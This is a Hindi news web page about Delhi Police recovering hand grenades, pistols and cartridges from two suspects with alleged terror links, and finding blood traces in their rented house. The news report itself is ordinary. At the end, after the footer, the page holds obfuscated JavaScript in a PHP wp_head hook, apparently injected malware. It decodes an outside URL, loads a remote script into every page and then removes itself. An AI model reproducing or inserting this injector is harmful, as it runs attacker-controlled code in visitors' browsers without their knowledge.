Friday, July 19, 2024
Google search engine
Homeअपराधदिल्ली में दो संदिग्धों की निशानदेही पर बरामद किये हैंड ग्रेनेड, उत्तराखंड...

दिल्ली में दो संदिग्धों की निशानदेही पर बरामद किये हैंड ग्रेनेड, उत्तराखंड का रहने वाला है एक आरोपी

दिल्ली: राजधानी दिल्ली (Delhi) को दहलाने की साजिश का पर्दाफाश हुआ है। 26 जनवरी से पहले दिल्ली पुलिस ने बड़ी आतंकी साजिश का खुलासा किया है। पुलिस ने जहांगीरपुरी (Jahangirpuri) के भलस्वा डेयरी इलाके में दो संदिग्धों के घर से हैंड ग्रेनेड बरामद किए हैं। दोनों संदिग्धों की निशानदेही पर ये हैंड ग्रेनेड बरामद किए गए हैं। पुलिस ने आरोपियों के पास से तीन पिस्टल और 22 जिंदा कारतूस भी बरामद किए हैं। दिल्ली पुलिस (Delhi Police) अभी दोनों संदिग्धों से पूछताछ कर रही है।

जानकारी के अनुसार, दिल्ली पुलिस की स्पेशल सेल ने गुरुवार को जगजीत सिंह (29) और नौशाद (56) के रूप में पहचाने गए दो लोगों को गिरफ्तार किया था। दोनों जहांगीरपुरी के भलस्वा डेयरी इलाके में किराए के मकान में रह रहे थे। पुलिस ने आरोपियों से पूछताछ की तो उन्होंने कई बातों को कबूल किया। संदिग्धों से पूछताछ के बीच पुलिस ने शुक्रवार को भलस्वा डेयरी थाना क्षेत्र में श्रद्धा नंद कॉलोनी में उनके किराए के घर पर छापा मारा और हैंड ग्रेनेड बरामद किए।

संदिग्धों के घर में खून के निशान भी मिले
सूत्रों ने बताया है कि हैंड ग्रेनेड और हथियारों के अलावा दोनों संदिग्धों के घर में खून के निशान भी मिले हैं। इसको देखते हुए वहां फोरेंसिक साइंस लेबोरेटरी (FSL) की टीम को भी बनाया गया था, जिसने खून के नमूने इकट्ठा किए। ऐसा माना जा रहा है कि किसी की हत्या यहां पर की गई है, और उसको फ्रिज में डिस्पोज ऑफ करने की कोशिश की गई है। सूत्रों के मुताबिक, आरोप है कि संदिग्धों ने घर में ही एक व्यक्ति की हत्या कर दी और हत्या का वीडियो अपने हैंडलर से साझा किया. बताया जा रहा है कि विदेशों में बैठे राष्ट्र विरोधी तत्वों से इन्हें निर्देश मिल रहे थे।

संदिग्धों का आतंकियों से जोड़े होने का शक
संदिग्ध जगजीत सिंह उर्फ जस्सू उत्तराखंड के उधम सिंह नगर का रहने वाला बताया जा रहा है। सूत्रों की मानें तो जगजीत कुख्यात बंबीहा गिरोह का सदस्य है। जगजीत हत्या केस में पैरोल के बाद से फरार चल रहा था, जो विदेश में बैठे खलिस्तानी आतंकी के संपर्क में था। खलिस्तानी आतंकी अर्शदीप से उसके संपर्क बताए जा रहे हैं। वहीं नौशाद दिल्ली के जहांगीरपुरी इलाके का रहने वाला है। दिल्ली पुलिस के सूत्रों का कहना है कि नौशाद आतंकी संगठन हरकत उल अंसार से जुड़ा हुआ है और वो हत्या के दो मामलों में सजा काट चुका है। विस्फोटक अधिनियम केस में भी उसे सजा हो चुकी है।

पुलिस के सामने कई सवाल
दिल्ली पुलिस अभी दोनों संदिग्धों से पूछताछ कर रही है और पता लगाने की कोशिश कर रही है कि कि आखिर इतने हथियार लेकर वो क्या प्लान बना रहे थे, क्या विदेशी आतंकियों के साथ दिल्ली को दहलाने की साजिश थी या फिर कोई दूसरा प्लान था।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>